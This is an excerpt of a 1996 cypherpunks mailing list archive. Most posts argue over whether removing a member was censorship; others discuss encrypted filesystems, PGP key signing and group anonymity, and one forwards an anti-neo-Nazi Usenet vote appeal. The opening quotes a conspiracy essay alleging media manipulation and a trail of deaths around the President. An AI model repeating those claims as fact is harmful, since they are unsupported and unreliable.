>business interests of foreign nations, which is 
>clearly, blatantly unconstitutional.
>     The above-mentioned national media directly 
>involved with this organization, which set the national 
>news agenda here in the U.S. and for much of the 
>western world, are the same ones which are manipulating 
>the current election by sanitizing all the news that 
>should be coming out of Washington and elsewhere, by 
>not tallying the impressive pile of corpses collecting 
>around the President, and most of all, by bombarding us 
>with PR-generated trivia and commercials 24 hours a day 
>when there are somewhat more significant things to 
>concern ourselves with.
>     And of course, the economy keeps getting better.
>     But just in case you ever wondered just how it 
>happened that some unknown governor of Arkansas ended 
>up tooling around the globe aboard Air Force One, now 
>you have a clue. And in case you thought people were 
>stupid, well, this makes a good case for people just 
>being manipulated. But of course, you'd have no way of 
>knowing this if the only place you got your information 
>was a television set or newspaper. Perhaps this is why 
>big government is so interested in censoring the 
>Internet.
>     I don't believe that the Trilateral Commission is 
>a conspiracy, I believe it's just one fact of how the 
>ruling class of the Western world organizes itself. 
>     There are other levels of aristocratic shadow-
>government organization, and they're quite worth while 
>to study, but this one sure points to some interesting 
>possibilities, and boy, the fact that you never hear it 
>mentioned should make really you wonder.
>     Not that there isn't enough to wonder about 
>already, and not that any of it matters.
>     After all, nothing really happens nowadays. Flight 
>800 got shot down, but nobody did it. It just sort of 
>exploded and fell out of the sky. Not only wasn't there 
>a perpetrator, there wasn't even a cause determined for 
>the explosion!
>     We have wars -- safe ones, where nobody comes back 
>with their arms and legs blown off. The federal budget 
>deficit increased by a few billion dollars in the time 
>it took me to write this article, and yet it's 
>meaningless. There is no public mention of the 
>Constitutional amendment, the famous 14th Amendment, 
>which explicitly states, "The validity of the public 
>debt of the United States...shall not be questioned." 
>It's the law of the land!
>     So, lest I blow a few too many of my brain cells 
>thinking about this, I will now go back to being an 
>astrologer.
>     End of exposé	
>









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 14 Nov 1996 22:15:04 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: Q.E.D |= Montgolfiering + Inbongis + Fermented Pear Juice
In-Reply-To: <Pine.BSI.3.95.961114030250.472F-100000@citrine.cyberstation.net>
Message-ID: <Pine.BSF.3.91.961115000356.12942G-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Look closely - it may be stego ...

-r.w.

On Thu, 14 Nov 1996 wichita@cyberstation.net wrote:

> 
>          Fermented Pear Juice == Supercilious Pap
> 
>          There they go again, the imperium, or so they think, of
>          cryptographic shamans are trying to bamboozle list readers
>          into believing their warped cryptographic gimcrackery. They
>          do not need Zadoc to anoint themselves the Solomons of the
>          cryptographic world. They think that they are perfectly
>          capable of doing it to themselves. Have they ever
>          cracked a single meaningful cryptographic system?  Have they ever
>          implemented a significant cryptographic system?


<SNIP>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 14 Nov 1996 22:03:32 -0800 (PST)
To: dave@kachina.jetcafe.org (Dave Hayes)
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611131951.LAA16239@kachina.jetcafe.org>
Message-ID: <199611150619.AAA01605@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> [This is a rebuttal to a misguided news article.]
> > Cypher-Censored
> > By Declan McCullagh (declan@well.com)
> Thank you for leaving your email address. It makes this easier.
> You people (read: the unaware and hypnotized masses, which includes
> reporters who's desire for attention and political safety holds them
> in line with the consensual illusion) keep missing the real issue, and
> substituting issues which only hold themselves in place.

     So you are explaining your problems in advance. Good, it tells 
thoughtful readers to take you with a grain of salt.  

> [Those of you who know, please excuse the mediaistic terms used in
> this rebuttal. One must use the symbols one is given to communicate
> at the level of understanding of those who use them.]

    Ok, I will try to keep from using too long words so you can understand
me. 

> In person-to-person interaction, one's only real defense against what
> one decides to call "unwanted" is to remove oneself from the arena of
> interaction. It may not be possible to ignore or run away from certain
> sources of input. 

     You forget "shutting down" the source of input. Turning off the 
radio, TV etc, or turning off the person speaking. 

> Logically, we must conclude that those who frequently and repeatedly
> cry for the censorship or removal of any source of input from
> cyberspace are either:
> 
> 	-quite clueless about the tools at their disposal
> 	-ideologically or personally opposed to the source of input
> or	-in need of large amounts of attention from others

    No problems with that. 

> >    The list is on Gilmore's machine and he can do what he wants with
> >    it; he can moderate the postings, he can censor material, he can
> >    shut the whole thing down. By kicking off an offending user, a
> >    list owner merely exercises his property right. There's no
> >    government involvement, so the First Amendment doesn't apply. And
> >    the deleted, disgruntled user is free to start his own mailing
> >    list with different rules.
> 
> Notice how, once the opposition is admitted to, the rationalization
> begins. Suddenly this is not a matter of censorship, but of ownership.
> Just as suddenly, the classic anti-free-speech arguments of "if you
> don't like it, start yer own" begin to surface. (Anyone ever notice
> how this resembles the "love it or leave it" mentality of certain
> American patriotic organizations?)

     It still isn't censorship. Censorship, at least in my dictionary, 
refers to censor, which uses the word "Official" several times. Mr. 
Gilmore is not an "Official" in a government sense, he maybe in the EFF
sense, but this is not an "Official" EFF organ, so that doesn't count. 

     He is the OWNER of this list, and the machine it runs on. If he chooses
(which he didn't) to keep someone from using the list, it is his right.

> What would ideological opposition be without the attempt at analogy? 
> Here we witness another example:
> 
> >        But then the question is whether Gilmore should have exercised
> >    that right, especially in such an open forum. Again, I think Gilmore's
> >    actions were justified. Consider inviting someone into your home or
> >    private club. If your guest is a boor, you might ask him to leave. If
> >    your guest is an slobbish drunk of a boor, you have a responsibility
> >    to require him to leave before he ruins the evening of others.
> 
> Notice that the net is compared to a home or private club. Actually

     WRONG. the "net' wasn't compared to either a home or a private club,
THIS LIST WAS. No one has the right to kick anyone off public streets, the
police _do_, but I seriously doubt that they could arrest you for refusing.
Gilmore didn't "Ban" Vulis from "The Net" (in fact he didn't even ban him 
from the list, he just removed him from the distribution list), he didn't
even try.

     He also didn't prevent Vulis from posting, tho' he could have. 

> the net is neither, however that would not serve the purposes of this
> analogy, so this fact is convienently forgotton. 
> The net is a wonderful place. Any ideology, no matter who disagrees or
> agrees with it, can be expressed and discussed here...assuming those
> who oppose this ideology do not have their way with the source of
> expression. There is a more refined and deeper truth to be found
> in the very existence of the set of all human ideologies, which is
> just beginning to show itself to some netizens. Unfortunately, this
> truth can be ruined when people equate some notion of value to 
> sources which ignore all but a tiny subset of the set of all ideologies:

     Again I repeat myself:

    Vulis was not "removed" in any way, shape, or form from "the net", all
Gilmore did was "Turn his back" on Vulis, saying in effect "Your bullshit
isn't wanted here". 

    He didn't tell Vulis to keep his opnion to himself, no one on this list 
did. He, and others here were asking Vulis to stop his repeated personel 
attacks on other list members, some were asking him to stop his vitrolic 
rants on racial and ethnic groups as well, which were _way_ off topic.  

> >        Eugene Volokh, a law professor at UCLA, runs a number of mailing
> >    lists and has kicked people off to maintain better editorial control.
> >    Volokh says that the most valuable publications are those that
> >    exercise the highest degree of editorial control.

> Value to whom and for what? If the editorial control produces one
> small element of the set of all ideologies, then this is only of value
> to the people who support this ideology. Given that the set of 

     You know, from your position I'd say you have a very clear view of 
your colon. 

     "Editorial Control" means that someone decides who get's published and
who doesn't. From your opposition to it, I guess you think that a magazine
dedicated to poetry should print all poems submitted, or as many, selected
in some sort of non-judgemental order, as they can fit. Or that a magazine
should print any writings submitted to it. 

     I run 4 mailing lists, one is personal, one is in the process of coming
online, and 2 are up and running. One of these has a rule: No Politics allowed.
I guess I am a pathetic little censorous worm huh? Nope. That rule was put 
there for a very good reason, and I am that reason. I love to talk politics,
but that is the WRONG FORUM for it. 

    Just like this is the wrong forum for Vulis to spew his shit. 

> people who support an issue is smaller than the set of people
> who support and oppose an issue, would the value not increase
> by allowing both sides of an issue equal speaking time? 

    Yes, and the cypherpunks list DOES THAT. Vulis wasn't kicked off for 
opposing Crypto, or the spread of Crypto, he was kicked off for littering,
and for refusing to stop littering. Actually he was kicked off for daring 
Gilmore to make him stop littering.  

> >        For his part, Gilmore calls removing the Russian mathematician "an
> >    act of leadership." He says: "It said we've all been putting up with
> >    this guy and it's time to stop. You're not welcome here... It seemed
> >    to me that a lot of the posts on cypherpunks were missing the mark.
> >    They seemed to have an idea that their ability to speak through my
> >    machine was guaranteed by the Constitution."
> 
> It is sad to note that this is the leader of one of America's
> forerunning organizations of freedom who says these words. For all
> *his* ideology of free speech, this statement reveals the hypocrasy he
> lives with for all to see. The true litmus test of free speech is to
> encounter speech that you *want* to censor.

     Not really, he was simply refusing to let Vulis share his (Gilmore's)
podium. 

> Mr. Gilmore, and other like minded parties, might want to consider
> what would happen if one parent company owned *all* communications
> media. Would they they be so supportive of the ideology of ownership
> and communciation they espouse?

     How would this happen? Setting up a press is fairly easy, at least 
a small hand operated press. Start your own magazine, start your own
mailing list. 

     That is what freedom is, the ability to _do it yourself_ not the 
requirement that others do it for you, or allow you to use what they 
have already built. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thug <thug@pan-net.de>
Date: Thu, 14 Nov 1996 15:39:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: [Fwd: Send this out to as many people as possible!!]]
Message-ID: <328BAEFA.549C@pan-net.de>
MIME-Version: 1.0
Content-Type: message/rfc822


To: weingarten@pan-net.de
Subject: [Fwd: Send this out to as many people as possible!!]
From: "[info group]" <info@pan-net.de>
Date: Thu, 14 Nov 1996 16:52:54 +0100
CC: thug@pan-net.de, jamy@jamestore.de, mitja@pan-net.de,fusion@pan-net.de, fireball@pan-net.de, wfh@pan-net.de,easy@pan-net.de, eternal@pan-net.de, ladydi@pan-net.de,crosscountry@pan-net.de, alphabit@pan-net.de, rainer@pan-net.de,albrecht@pan-net.de, carolin@pan-net.de, schnell@mcis.de,galle@mcis.de, mario@mcis.de, kirby@mcis.de
Organization: PAN-AMP
Reply-To: info@pan-net.de

-- 
 ----------------------------------
 diese eMail wurde gesendet aus dem
         SURF INN HANNOVER
      part of the  MOVE!NATION
      http://talker.pan-net.de
 ----------------------------------


To: Alfs@Falstaff.Physik.Uni-Bremen.DE, chervin@bgumail.bgu.ac.il,       alc@mundil.cs.mu.oz.au, alessio@dorlayer.it,       sascha.hoeffken@rz.ruhr-uni-bochum.de,       06214183208-0001@t-online.de (Hornig), jurgitaj@sseriga.edu.lv,       ib95juja@mikkeliamk.fi, NAZARIAN@wiwi.uni-frankfurt.de,       Markus.Opitz@stud.uni-regensburg.de, plepys@sobten.ktu.lt,       unlimit@POBoxes.com, schlick@wiwi.uni-frankfurt.de, slange@usa.net,       schuele@student.uni-kl.de, jura@senna.std.lt,       679238@pcmail.rz.fht-esslingen.de,       harald_woeste.wi@mail.wupperinst.org, nadia@dorlayer.it,       darkness@pub.ost.lt, <desiderius@hotmal.com>, jbuckle2@wvu.edu,       slange@usa.net, sonnenberg.3@osu.edu, waltie@jbx.com, ink@pan-net.de,       genex@wupper.de, iy95mamu@mikkeliamk.fi
Subject: Send this out to as many people as possible!!
From: "Anastasia" <SCHUELE@nfask2.fask.uni-mainz.de>
Date: Thu, 14 Nov 1996 14:24:22 GMT +0100
Organization: JOGU Mainz - FASK
Priority: normal


dear folks,

you know where your priorities are. 

So let's vote



A group of NEO-NAZIS are trying to form a newsgroup on
Usenet called "rec.music.white-power", so that they can get their
message of hate out to young people using the Internet.
Newsgroups are public discussions on the Internet and their
formation requires enough support from the Internet community.
EACH AND EVERY ONE OF US HAS ONE VOTE when it comes
to creating a new Usenet group.  I hope you will vote NO and
thereby tell these NAZIS we don't want their stuff on the net.
Below is the procedure, please repost this plea and get the NO vote
out.  If you want to see the official call for votes, you can try on
"news.group".
            DO NOT VOTE TWICE - that would constitute voting fraud. 
            
HOW TO VOTE:
     Send e-mail (posts to newsgroups are invalid) to:
     music-vote@sub-rosa.com
     This is an impartial, third party vote taker.
     Please check the address before you mail your vote. Your mail
     message,  to be accepted by the counting computer,  must
     contain only the following statement with no signature:

     I vote NO on rec.music.white-power

     Vote counting is automated.  Failure to follow these directions 
may mean that your vote does not get counted.  If you do not receive
an acknowledgment of your vote within three days contact the
votetaker about the problem.  It's your responsibility to make sure
your vote is registered correctly.
    Here's what Canada's George Burdi, of the neo-Nazi Heritage Front, 
had to say about this vote, on February 21, on his RESISTANCE
mailing list:
   "There is a call for votes coming on rec.music.white-power
   in the next week or so, and you will be notified in a special
   issue of RREN exactly what to do.  FOLLOW THE INSTRUCTIONS
   TO THE LETTER.  Let me be perfectly blunt and state that we
   have more than enough net-nazis to win this thing handsdown. But 
   every one of you must vote YES!  And just voting    yes means 
   nothing unless you do it properly.  So you have   been forewarned.  
   The instructions are coming to your email  box soon, and they are
   not complicated.  Just follow them as told, and we will have a WP
   music newsgroup finally!
     If Mr. Burdi's confidence disturbs you, please give this letter 
the widest possible distribution, and help us deliver the largest NO 
vote in the history of the UseNet.


*******************HAVE A GOOD DAY*****************

*************REGARDS FROM LUXEMBOURG************



********************************

       We, the Willing, 
     Led by the Unknowing,
   Are doing the Impossible
      For the Ungrateful.
     We have done so Much
        With so Little 
         For so Long
     We now are Qualified
        To do Anything
         With Nothing.
                      
                     Source Unknown
                        
********************************                      





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 14 Nov 1996 22:37:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mounting Crypted directories on Multiuser Machines.
Message-ID: <199611150654.AAA01811@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 I was wondering about something: 
 
       Say you have a unix (or other multi-user OS) box, how hard would 
 it be for someone who was good at programming to modify Blaze's CFS to 
 allow the following:
 
       Every user has a directory:
 
      /home/usr1/
           /usr2/
           /usr3/
 
       and inside each directory they have:
 
       /home/usr1/html/
                 /files/
                 /.login    
                 /.usr1crypt
 
      such that /.usr1crypt gets mounted at _login_ time as a crypted file
 system under /files.
 
      The way I envision this is that one would log in (either from the console,
 or via ssh ideally) and be presented with the option of mounting said directory
 and asked for a passphrase, then the directory gets mounted. 
 
      I took a look at Blaze's CFS, but he mentions that it is really only for 
 a single user system, and well <looks sheepish I can't get it to compile 
 on my machine, so I can't really play with it on my end. 
 
      I would think that this would be fairly difficult, otherwise it would 
 have already been done right? 
 
      Or am I missing something more basic? 
 
      It would seem that running something like this would do 2 things.
   
      1) It would be much more difficult to prove that a service provider 
         knew what files a user was keeping lying around because unless
         the user was logged in, not even the Sysadmin could "peek" at the
         files.
      2) Provide the user with greater privacy. Users could keep PGP keys 
         on the system without much risk, and as long as access was either
         thru the console, or thru something like ssh, you should be rather
         safe. 
  
       Is anyone working toward something like this? I kinda got the idea that
 CFS was more designed and intended for single-user-at-a-time systems, but the
 application I had in mind was more of a (old) C2-type organization. 
 
 
 Petro, Christopher C.
 petro@suba.com <prefered for any non-list stuff
 snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Fri, 15 Nov 1996 01:09:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Conspiracy To Erect An Electronic Iron Curtain
In-Reply-To: <19961114.205947.7711.21.kb4vwa@juno.com>
Message-ID: <328C33AD.3E78@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone using the name "Edward R. Figueroa" <kb4vwa@juno.com> today 
wrote:
> 
> An Essay by L. R. Beam

Oh, come on, I'm sure everybody's read this several times, since it was 
spammed so widely back in February. A URL would do. You can read lots 
more by and about Louis Beam, who uses an AOL account, at 
http://www.nizkor.org/ftp.cgi?people/b/beam.louis or 
http://www.stormfront.org, and so on. I recommend "Leaderless 
Resistance."

If you want someone who would be more likely to appeal to cypherpunks, 
try John Gardner <ygg@netcom.com>; he's a little softer around the 
edges, and he's local. "Dave Harman" never showed up for a cypherpunks 
meeting, but maybe Yggdrasil will. Why not; we were going to invite 
Vulis. John has my number.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Thu, 14 Nov 1996 22:38:32 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: A Disservice to Mr. Bell
In-Reply-To: <199611150549.VAA18649@mail.pacifier.com>
Message-ID: <9611150643.AA01829@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim appears to be arguing that the "common law" courts heis refering
to had judges appointed by the King. If so the right to appoint
judges to those posts passed to the US government under the treaty
of Paris. 

The Common Law in the UK was the kings law since the Norman conquest.
It is as any schoolboy knows judge made law. The doctrine of precedent
has become more and more prominent since the renaisance though, effectively
preventing judicial lawmaking except in areas where no law is believed
to exist.

As a system of government I don't think very much of the idea of a 
bunch of klansmen getting together to decide who they dislike. Sounds
much more like a lynch mob than a system of government to me. 

Since Browne couldn't even manage fourth place, despite the attentions
of the net it doesn't look as if the US people are particularly 
inclined to the libertarian view. Nader managed a vote about 20%
higher despite only running in a handful of states while Browne was
on the ballot in every state. Contrary to Bellsclaim that the state
is being challenged by libertarian and millitia ideas it looks to
me that the tide is flowing in the opposite direction if its flowing
at all.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Thu, 14 Nov 1996 22:48:24 -0800 (PST)
To: CypherPunks Mailing List <cypherpunks@toad.com>
Subject: [CRYPTO] web-of-trust, signatures, and anonymity
Message-ID: <Pine.LNX.3.95.961115010358.1916C-100000@tgrafix.livesys.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Ok, People...

Let's say that I receive a message via a mailing list from an entity.

This message is signed with a PGP public key.  Being that I am
interested in some of the ideas proposed by this entity, I respond to
the message, but I fat-finger my mailer and it sends out the message
unsigned.  However, my .signature is reasonably automated and my
public key id is included there.

I obtain the the public key associated with the original entity from
the keyservers and the signature verifies, but the key on the servers
is not signed.

Concurrently, I receive a message in response to a message I sent to
this entity, which comes to me encrypted with my public key and signed
with the private key paired off to the public key I obtained for
this entity from a keyserver.

Being a believer in anonymity, I feel that whatever person, machine,
or thing which placed the key on the keyserver and kindly responded to
my message is reasonably expected to be the owner of the private key
associated with the public key I obtained.  Is this a fallacy?

Am I wrong to sign the public key I got from the keyserver and return
said key to the address purported to be the entity of ownership?  What
the entity does with the signature is, in my opinion up to it.

Is it unrealistic to assign the probability of two entities being able
to generate signatures for the same public key as close to zero?
(consider that this is a 2047 bit key)

Am I opening myself to attacks?  By this, I mean to ask whether
or not MY key is in any way possibly compromised in the exchange
described.

I keep a separate and 'unpublished' keypair to be used for physically
met individuals.  The public key of this keypair is NEVER sent by any
means other than physically.  This key signs only the keys of the
people I meet in person or have extensive telephone conversations
with.  While people who recieve the signature of this key also get a
copy of it, I only distribute this key to those I trust not to
disseminate it further.

- ---
"Obviously, the US Constitution isn't perfect, but
it's a lot better than what we have now." - Unknown
PGP key id - 0xDEACDFD1 - Full key available from
pgp-public-keys@pgp.mit.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQEVAwUBMowSJc1+l8EKBK5FAQEg2Af/agcalrlyDK+Ku+Qq7cnODOJjFIcsDAjh
LLuA6KG2DeDQUiAH72uL5WgdiHQaZroAhqRsFGDic3zmc0YGDQkI4W2KTTsVFi08
ubcX9JCnOGuDWxLIwvBdCX/FxDsPyrhTeEUNjjkXp+5k+BdxzLTfbUgbnLgM/BGJ
wD3Bq+evmTr86ul0SLUs3KL5h0488LhalPYTKtm9hdO9f3K01kz5W+FLUK3lXKJb
YH2e2Ob2Nr/uSH6ElluSMVGtU09i+s40uloqokzAyB7NuTStSCupqUw0nHQKFIY7
Or8uwmZF6c7ivtacstViZ7/6xM0km7wmoyWsee3gxe63LH/Mqr25/A==
=0HFl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 15 Nov 1996 06:03:55 -0800 (PST)
To: vznuri@netcom.com
Subject: moderation vs filtering
In-Reply-To: <199611150347.TAA10625@netcom20.netcom.com>
Message-ID: <199611150156.BAA00364@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Vlad Nuri <vznuri@netcom.com> writes:
> >Cypherpunks does not seem to me to be anything like the well-
> >regulated lists you ascribe to Prof Volokh.
> >
> 
> Declan should rest his point here. the cpunk listis notorious
> for being way astray. yet cpunks continuously argue against
> anyone with a moderator type role. could there be some correlation
> between lack of moderation/leadership on the list and the 
> piles of noise that people incessantly complain about? of 
> course I'm insane for suggesting this.

Lack of a moderator doesn't preclude you from reading one of the
filtered lists.  If anyone doesn't want to take the time to filter
their own reading, they can subscribe to one of the filtered lists.
This gives you more choice than a centrally censored/moderated list;
you choose which filtered list to subscribe to, or to subscribe to the
unfiltered list, or to do your own filtering via kill files, junking
threads etc.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Thu, 14 Nov 1996 16:05:31 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
Message-ID: <199611150403.CAA10921@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 08:30 ðì 14/11/1996 -0500, aga wrote:
>> * Dave says "Notice that the net is compared to a home or private club." 
>> Wrong. I never compared the Net to such. However, a mailing list run on a
>> computer in someone's home with his own cash is very similar to a private
>> club.  There are private speech restrictions on the Net. Gated communities
>> exist.  Try to join the "lawprofs" mailing list. You can't; you're not
>> (and quite obviously anything but) a law professor. Censorship? Not quite. 
>> 
>None of that analogy is applicable to the cyberpunks list.
>When a list gets as big as that, it it no longer to be considered
>a "mailing-list" but it is a _public_ forum.  The whole problem
>here is the abuse of power by both the EFF and John Gilmore.

Indeed. But it's not only a question of 'size'. Perhaps less people might
take part, but it would still be a _public_ list, just as an "open meeting"
announced to take place in a _private_ house, is still an open meeting.

Does the fact that the _building_ used by the meeting is private and
possibly donated for this purpose make the meeting less public (than
explicitly announced)?

This analogy (meeting = mailing-list, building-owner=list-owner) is
_quite_ exact, as a matter of fact, and it's not at all a 'party'.










>> By the way, if you haven't figured it out yet, Mr. "Freedom Knight of
>> Usenet,"  a private mailing list is NOT Usenet. Get a clue. 
>
>Wrong!  The cyberpunks mailing list is PUBLIC property and should
>NOT be controlled by John Gilmore!  This just goes to show the real
>facist censorship motives that the EFF has behind it.

Yep. Morevover, ANOTHER _sense_ in which the cypherpunks list is
PUBLIC is the following:  Posters are the _owners_ of their _ideas_.
So the messages in the list are the (intellectual) property of the
people who wrote them; not the list-owner's. The false analogy here
is between a mailing list and a newspaper; But the newspaper (1) is
sold in ALL public places (2) is dependent on money and works (in the
end) for the financial best interests of its owner, and (3) is not
interactive, i.e. the readers are not at all _also_ writers in it.

We have to clear these things up, dear aga, and no longer misunderstand
each other. Perhaps when I burst out (one of the first) against Dimitri's
expulsion I shouldn't have used the adjective 'Yankee', in denouncing
the mentality you also denounce. The reason I said 'Yankee' is because
it seems to be _very_ common in your part of the world. It's not because
I 'hate' or 'envy' Yanks! But I strongly believe that there are quite
common _assumptions_ appearing again and again throughout the Net,
which _do_ originate in the States, among the people you _also_ oppose.

In my part of the world, NOBODY would EVER, seriously claim that an "open
meeting" held in his house is subject to his "censorship". Then the
meeting would by definition NOT be public...

Other than these (serious points) we both seem to love our countries
and this has nothing to do with nationalism or petty patriotism (IMO).




>Time to kill the EFF, and let it rot in hell.  They are disgrace
>to the entire InterNet community.  I run 6 different mailing lists,
>and have NEVER puled the plug on anyone, even when they criticize me.
>
>The first time is the time when you lose all credibility, and there
>is never any forgiveness for a plug-puller.

THIS is a very SERIOUS point: Censorship is like... prostitution.
The first time a person accepts money to offer a... blow-job, is
sufficient for the loss of all sexual credibility. Similarly, people
who ban someone from some medium of expression become _PIMPS_, which
is far worse than whores (whose therapeutic role has been grossly
underestimated by the world's cultures)... ROTFL!!!!

Indeed, in my country, we use the word "pimp" for an editor who
sacks journalists because of disagreeing with their opinions.
(even though as I said the 'journalism' analogy is irrelevant here).

Finally, only a fool or a bigot would fail to realize the
seriousness and the correctness of what aga has said.

So I shake your hand, Yankee rascal! :-)
Peace
George





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Thu, 14 Nov 1996 17:18:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Media seekers, reputation and banishment
Message-ID: <199611150117.CAA06588@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Seems like the Freedom-Knights are seeking a little publicity? Perhaps an interview in Wired?
A column in the WaPo? A spot on www.TV.com? Are these the same folks who gather around
at fires and crime scenes trying to get into the camera? "Hi Mom! We're on CP now! Look
at me!"

bwahahhhaha

I find the aga/hayes posts amusing. It's amazing at how people have refined their skills at rhetoric,
debate and insults. The poisoned pen gets much practice.

So the aga/hayes posts attempt to extract reputation from Gilmore and Declan. It is interesting
to see how attacts on reputation are futile as reputation is built up (or spent) gradually. Pointing
a finger and shouting "You are stoopid!" is obviously ineffective at damaging any credibility other
than that of the person holding the finger. Remove the insults and aga and Hayes offer little 
in the way of compelling arguements.

Maybe Gilmore made a mistake in removing DV from CP. Perhaps it is a contradiction of some ideal
of open dialog and free speech. DV seems to have unlimitted energy for insults, rants, and blather,
so removing him directly (with the actual effect of simply making it less convienent for him or her to 
post) was a practical move not a philosophical move. A practical move to assert the will of the 
community.

A community offers few punishments for asocial behavior. Killfiles are partly effective. But the strongest
punishment is banishment. 

The issue is not "is banishing unruly louts from the discussion censorship" as censorship is a state
of being threatened with loss of liberty for what one says. The issue is "do we individually banish
asocial louts or collectively?" and of course how do we decide who to banish. All of this  is certainly 
easier when done individually yet it is often prudent and effective to have someone take
action when they are in a position to do be effective. Gilmore acted properly in my opinion. And DV
remains in my killfile.

diGriz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 15 Nov 1996 00:01:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Members of Parliament Problem
In-Reply-To: <v02140b01aeb1a0ff57d2@[192.0.2.1]>
Message-ID: <Pine.LNX.3.95.961115024717.3497A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 14 Nov 1996, Peter Hendrickson wrote:

> I read awhile ago that certain members of Parliament do not speak
> their mind regarding the situation in Northern Ireland.  The reason
> they give is that they have children and they fear the IRA.
> 
> There are times when one wishes to speak anonymously, yet speak
> as a member of a group.
> 
> Is there a way to take published public keys and combine them with
> your own in such a way that your identity is not compromised, but
> it is clear beyond a doubt that you control one of a set of public
> keys?

One way would be to have some trusted third party issue a signature for any
key that belongs to a member of the group.  The problem with this method is
that the certificate issuer knows which keys belong to which members.  This
can be solved by blind-signing the keys.  A single secret key could be
distributed to every member, but this is vulnerable to security problems.
Also, it would be impossible to determine if a group of messages were each
issued by different people or if it was the same person.

I don't know if there is any better cryptographic protocol to handle a
situation like this.  Oblivious signatures might be a possibility, but I don't
know how they work and if they could be used in such a protocol.

Mark
- --   
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMowjzizIPc7jvyFpAQGWnQf/fH+RLAE8AUW8CrASprXuHZH/z2/30M6l
zWeC8E43dh1Hy4YLqeNyKNblHp717vla2/EeOJQUuKN0FBMdJoJVGP+dH4BKMgWA
mobfOhq+n+vDQCvwonkrjy2oq5+2ULS6uIkGLvaMRrCWwJ9wElE6LHOAo/Tz9Y8p
71ICTn6k9z6V67Aeu/5q0GyY4QrLdPZqxNpjW7LqGkV5LNTTttqxCiWlrpRqLRJu
81qgBrDZtTG0nB8emqW3lpTag48yyeePAAYMuryLQ3y7lDfrQloZ+t5MtOgnrUlw
dVvQ2hIn9KVNKlkmJi/7aLFUZxp5jNaEtP1+LxPGHouiJC3utp3cJA==
=I6hn
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Fri, 15 Nov 1996 03:58:56 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: "Freedom Knights" are closet censors
In-Reply-To: <Pine.GSO.3.95.961114104601.22840A-100000@well.com>
Message-ID: <Pine.LNX.3.95.961115065233.2693C-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Nov 1996, Declan McCullagh wrote:

> Date: Thu, 14 Nov 1996 10:48:41 -0800 (PST)
> From: Declan McCullagh <declan@well.com>
> Reply-To: freedom-knights@jetcafe.org
> To: Dave Hayes <dave@kachina.jetcafe.org>
> Cc: freedom-knights@jetcafe.org, cypherpunks@toad.com
> Subject: Re: "Freedom Knights" are closet censors 
> 
> 
> On Thu, 14 Nov 1996, Dave Hayes wrote:
> 
> > Sorry, that *is* the point. If you tell me you are going to disrupt
> > the list, I am not going to let you on the list...even though you
> > are easily ignored. 
> 
> And if Vulis shows Gilmore, though his actions, that he is going to
> disrupt cypherpunks, Vulis can be prevented from being on the list...even
> though he is easily ignored.
> 
> The freedom you, Dave, are exercising as owner and perhaps moderator of
> freedom-knights, is precisely the same freedom that Gilmore should and
> does enjoy.
> 

Bullshit!  There is NO similarity at ALL between the cyberpunks list
and the F-K list, and the comparison between the two is grossly
misplaced.

